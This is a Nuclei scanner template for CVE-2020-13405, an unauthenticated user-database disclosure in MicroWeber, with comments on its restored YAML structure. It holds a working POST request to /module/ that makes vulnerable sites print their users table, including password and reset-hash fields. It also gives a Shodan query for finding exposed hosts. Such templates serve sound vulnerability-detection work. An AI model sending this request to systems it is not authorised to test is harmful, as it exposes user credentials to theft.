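# Nuclei template for CVE-2020-13405 (MicroWeber unauthenticated users-table
# disclosure). Block structure is restored below: the flattened form lost the
# indentation that nests info/requests/payloads/matchers, which makes the
# document unparseable as a Nuclei template.
id: CVE-2020-13405

info:
  name: MicroWeber - Unauthenticated User Database Disclosure
  author: ritikchaddha,amit-jd
  severity: high
  description: |
    The PHP code for controller.php run Laravel's dump and die function on the users database. Dump and die simply prints the contents of the entire PHP variable (in this case, the users database) out to HTML.
  reference:
    - https://rhinosecuritylabs.com/research/microweber-database-disclosure/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13405
    - https://github.com/microweber/microweber/commit/269320e0e0e06a1785e1a1556da769a34280b7e6
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-13405
    cwe-id: CWE-306
  metadata:
    # Quoted so the embedded colon and double quotes can never be read as
    # YAML structure by a strict parser; the value is unchanged.
    shodan-query: 'http.html:"microweber"'
    verified: "true"
  tags: cve,cve2020,microweber,unauth,disclosure

requests:
  - raw:
      # One request per `endpoint` payload value; the blank line before the
      # body is part of the HTTP message and must stay inside the block scalar.
      - |
        POST /module/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{BaseURL}}admin/view:modules/load_module:users

        module={{endpoint}}

    payloads:
      endpoint:
        - "users/controller"
        - "modules/users/controller"
        - "/modules/users/controller"

    matchers:
      # All DSL conditions must hold (condition: and): the response has to be a
      # 200 HTML page whose body carries the users-table column names, which
      # keeps a plain error or login page from being reported as a finding.
      - type: dsl
        dsl:
          - 'contains(body,"username")'
          - 'contains(body,"password")'
          - 'contains(body,"password_reset_hash")'
          - 'status_code==200'
          - 'contains(all_headers,"text/html")'
        condition: and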